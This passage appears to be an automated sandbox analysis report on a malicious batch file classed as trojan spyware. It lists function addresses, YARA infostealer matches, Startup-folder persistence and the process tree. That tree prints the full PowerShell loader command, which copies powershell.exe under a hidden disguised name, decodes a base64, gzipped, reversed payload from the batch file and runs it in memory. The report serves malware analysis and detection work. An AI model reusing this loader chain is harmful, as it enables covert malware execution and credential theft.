Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA55B8 NtProtectVirtualMemory, 7_2_08AA55B8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA6E40 NtResumeThread, 7_2_08AA6E40
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA55B2 NtProtectVirtualMemory, 7_2_08AA55B2
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA6E38 NtResumeThread, 7_2_08AA6E38
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_0419F110 7_2_0419F110
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A810E0 7_2_08A810E0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A83690 7_2_08A83690
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A84210 7_2_08A84210
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A824A9 7_2_08A824A9
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A824B8 7_2_08A824B8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A810D2 7_2_08A810D2
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A885A0 7_2_08A885A0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A88590 7_2_08A88590
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A841FF 7_2_08A841FF
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A83680 7_2_08A83680
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A84208 7_2_08A84208
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A97490 7_2_08A97490
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9D518 7_2_08A9D518
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9C6E8 7_2_08A9C6E8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9C839 7_2_08A9C839
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9D977 7_2_08A9D977
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9F520 7_2_08A9F520
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9D507 7_2_08A9D507
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A9C6DA 7_2_08A9C6DA
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA2D78 7_2_08AA2D78
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA1E48 7_2_08AA1E48
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA6154 7_2_08AA6154
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA9488 7_2_08AA9488
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AA9478 7_2_08AA9478
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABD008 7_2_08ABD008
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB0040 7_2_08AB0040
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB19A3 7_2_08AB19A3
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABC328 7_2_08ABC328
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB0011 7_2_08AB0011
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB53EF 7_2_08AB53EF
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABBB68 7_2_08ABBB68
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABBB78 7_2_08ABBB78
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB64EF 7_2_08AB64EF
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB5400 7_2_08AB5400
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08AB6500 7_2_08AB6500
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08ABCFF8 7_2_08ABCFF8
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7C940 7_2_08B7C940
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B78700 7_2_08B78700
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B738BA 7_2_08B738BA
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B70006 7_2_08B70006
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B70040 7_2_08B70040
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7DB48 7_2_08B7DB48
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7CC67 7_2_08B7CC67
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B79788 7_2_08B79788
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7977A 7_2_08B7977A
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08C70040 7_2_08C70040
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08C70019 7_2_08C70019
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08F0EB20 7_2_08F0EB20
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08F0DE88 7_2_08F0DE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02564AC0 8_2_02564AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02563EA8 8_2_02563EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_025641F0 8_2_025641F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_0256F600 8_2_0256F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FDADC8 8_2_05FDADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FDB4A8 8_2_05FDB4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD6780 8_2_05FD6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FDE959 8_2_05FDE959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD88A8 8_2_05FD88A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD0040 8_2_05FD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD3390 8_2_05FD3390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD8FFB 8_2_05FD8FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD5988 8_2_05FD5988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_065B33D0 8_2_065B33D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_05FD0006 8_2_05FD0006
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_00C3F110 16_2_00C3F110
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_06FB3098 16_2_06FB3098
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_06FB3052 16_2_06FB3052
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881C940 16_2_0881C940
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08818700 16_2_08818700
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_088138BA 16_2_088138BA
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881DB48 16_2_0881DB48
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881CC67 16_2_0881CC67
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08810012 16_2_08810012
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08810040 16_2_08810040
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08819788 16_2_08819788
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881977F 16_2_0881977F
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08910006 16_2_08910006
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08910040 16_2_08910040
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08BAEB20 16_2_08BAEB20
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_08BADE88 16_2_08BADE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_01414AC0 18_2_01414AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_01413EA8 18_2_01413EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_014141F0 18_2_014141F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_0141F6D8 18_2_0141F6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B6780 18_2_062B6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062BB4A8 18_2_062BB4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B3390 18_2_062B3390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B0040 18_2_062B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062BADC8 18_2_062BADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B88A8 18_2_062B88A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062BE959 18_2_062BE959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B8FFB 18_2_062B8FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B5988 18_2_062B5988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_06A333D0 18_2_06A333D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_062B001E 18_2_062B001E
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000584E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTECHNICAL-SPECIFICATION.exeP vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNwxpdpym.dll" vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1365527547.00000000006DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004700000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1404676105.00000000088E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNwxpdpym.dll" vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1343010484.0000000000A94000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs ilZhNx3JAc.bat
Source: ilZhNx3JAc.bat.Dmf.5.dr Binary or memory string: OriginalFilenamePowerShell.EXEj% vs ilZhNx3JAc.bat
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 7.2.ilZhNx3JAc.bat.Dmf.8000000.9.raw.unpack, ExceptionServer.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, ZTFEpdjP8zw.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, WnRNxU.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 2njIk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, I5ElxL.cs Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, QQSiOsa4hPS.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, FdHU4eb83Z7.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winBAT@31/9@4/2
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar35we2c.lka.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\chcp.com Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File read: C:\Users\user\Desktop\ilZhNx3JAc.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
